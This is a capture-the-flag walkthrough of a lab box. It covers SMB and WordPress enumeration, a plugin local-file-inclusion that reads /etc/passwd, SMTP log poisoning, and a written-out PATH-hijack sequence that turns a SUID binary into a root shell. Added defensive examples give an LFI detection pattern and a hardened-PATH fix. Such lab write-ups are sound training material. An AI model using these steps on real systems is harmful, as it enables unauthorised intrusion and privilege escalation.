Scanning the box with nmap -A -T4 -p- 192.168.1.11 -vv:

The host is running an SMB service, so we can scan it and list the shares:

The share contains a file named attention.txt:

We can now log in as the user helios with one of the passwords listed there; after testing each one, qwerty works:

Let's download the two files research.txt and todo.txt:

The new path /h3l105 is a WordPress site; we also add symfonos.local to the hosts file, then enumerate plugins with wpscan:

wpscan --url http://192.168.1.11/h3l105/ -e p

It reports that directory listing is enabled on the uploads directory, so we check it out and find 3 subdirectories:

So I googled it and found an exploit for it:

The exploit is a local file inclusion (LFI), which we use to display the /etc/passwd file:

At this point, back when I was doing enumeration, port 25 was open and had had no use until now; we can use the SMTP log poisoning method:

Then we put this line in the address:

And we get something like this:

Now, to get a shell, we send this command:
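The LFI and log poisoning steps above leave a recognisable trail in the web server's access log. The following is an added example (not part of the original writeup) of the check a defender would run over such a log: it flags requests carrying path traversal sequences or direct references to /etc/passwd, log directories or /proc. The log lines, the plugin path placeholder and the `file=` parameter name are constructed for the example and are not taken from the box.

```shell
#!/bin/sh
# Added example (not from the writeup): flag access-log requests that look like
# local-file-inclusion attempts, i.e. path traversal (plain or URL-encoded) or
# direct references to /etc/passwd, log directories or /proc/self.

# Constructed sample access-log lines (not real traffic from the box).
# PLUGIN_PLACEHOLDER stands in for the vulnerable plugin, which this example does not name.
SAMPLE_LOG='192.168.1.5 - - [10/Jul/2019:10:01:02 +0000] "GET /h3l105/ HTTP/1.1" 200 5123
192.168.1.5 - - [10/Jul/2019:10:01:09 +0000] "GET /h3l105/wp-content/uploads/ HTTP/1.1" 200 812
192.168.1.5 - - [10/Jul/2019:10:02:44 +0000] "GET /h3l105/wp-content/plugins/PLUGIN_PLACEHOLDER/index.php?file=../../../../../etc/passwd HTTP/1.1" 200 2201
192.168.1.5 - - [10/Jul/2019:10:03:10 +0000] "GET /h3l105/wp-content/plugins/PLUGIN_PLACEHOLDER/index.php?file=../../../../../var/log/mail.log HTTP/1.1" 200 9912
192.168.1.5 - - [10/Jul/2019:10:03:30 +0000] "GET /h3l105/?p=1 HTTP/1.1" 200 4420'

# Indicators: "../" in plain or URL-encoded form, /etc/passwd, any log directory,
# and /proc/self (a common target for environment-based inclusion).
LFI_PATTERN='(\.\./|\.\.%2[fF]|%2[eE]%2[eE]|/etc/passwd|/var/log/|/proc/self/)'

# Print every log line that matches the indicator pattern; prints nothing when clean.
flag_lfi_requests() {
    printf '%s\n' "$1" | grep -E -i "$LFI_PATTERN" || true
}

# Count the flagged lines; prints 0 when there are none.
count_lfi_requests() {
    flag_lfi_requests "$1" | grep -c . || true
}

# Demonstration on the constructed sample: two of the five lines are flagged.
flag_lfi_requests "$SAMPLE_LOG"
```

On a real server, pass the log contents in with `flag_lfi_requests "$(cat /var/log/apache2/access.log)"` (path is an assumption; use the web server's actual access log). The pattern is deliberately broad; a hit on `/var/log/` right after a traversal attempt is exactly the sequence that precedes log poisoning, so those two indicators together are worth an alert on their own.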

Let's use "find" to find SUID files: find / -perm -u=s -type f 2>/dev/null

There is a file /opt/statuscheck that we can abuse through PATH hijacking:

cd /tmp
echo "/bin/sh" > curl        # fake curl that the SUID binary will pick up instead of the real one
chmod 777 curl
echo $PATH                    # current search path
export PATH=/tmp:$PATH        # put /tmp first so our curl is found before /usr/bin/curl
/opt/statuscheck
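The root cause of the escalation above is that /opt/statuscheck runs its helper by bare name, so whoever controls PATH controls which binary runs. The script below is an added example (not the box's /opt/statuscheck and not the writeup's code) that shows the vulnerable pattern next to its fix: the hardened function resets PATH to the system directories before invoking anything. The helper it invokes (`uname`, held in `PROBE_CMD`) is a stand-in for curl so the example runs anywhere, and the shim that `run_with_shim` builds only prints a marker.

```shell
#!/bin/sh
# Added example (not the box's /opt/statuscheck): a status-check helper written
# two ways. The vulnerable form invokes its tool by bare name, so the caller's
# PATH decides which binary runs; the hardened form pins PATH before the call.
# PROBE_CMD is an assumption of this example and stands in for curl.
PROBE_CMD=uname

# Vulnerable: the command is looked up through whatever PATH the caller exported.
statuscheck_vulnerable() {
    "$PROBE_CMD" -s
}

# Hardened: reset PATH to system directories for the duration of the call.
# A SUID binary should do the same (or call the absolute path) before running
# any external command, since the caller fully controls its environment.
statuscheck_hardened() {
    ( PATH=/usr/bin:/bin; export PATH; "$PROBE_CMD" -s )
}

# Harness: create a throwaway directory holding a shim named like the tool,
# prepend it to PATH the way the writeup does, run the given function there,
# and return its output so the two versions can be compared.
run_with_shim() {   # $1 = name of the function to run
    shim_dir=$(mktemp -d)
    printf '#!/bin/sh\necho HIJACKED\n' > "$shim_dir/$PROBE_CMD"
    chmod 755 "$shim_dir/$PROBE_CMD"
    result=$( PATH="$shim_dir:$PATH"; export PATH; "$1" )
    rm -rf "$shim_dir"
    printf '%s\n' "$result"
}

# Demonstration: the first call runs the shim, the second runs the real tool.
echo "vulnerable: $(run_with_shim statuscheck_vulnerable)"
echo "hardened:   $(run_with_shim statuscheck_hardened)"
```

For a compiled SUID program the equivalent fix is to call the helper by absolute path or to set PATH to a fixed value (or clear the environment) before `system()` or `execvp()`; an audit of the `find` output above should check each SUID binary for bare command names in its `strings` output. Note that the script form is only an illustration: the kernel ignores the SUID bit on interpreted scripts, so the real-world case is always a compiled binary like /opt/statuscheck.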
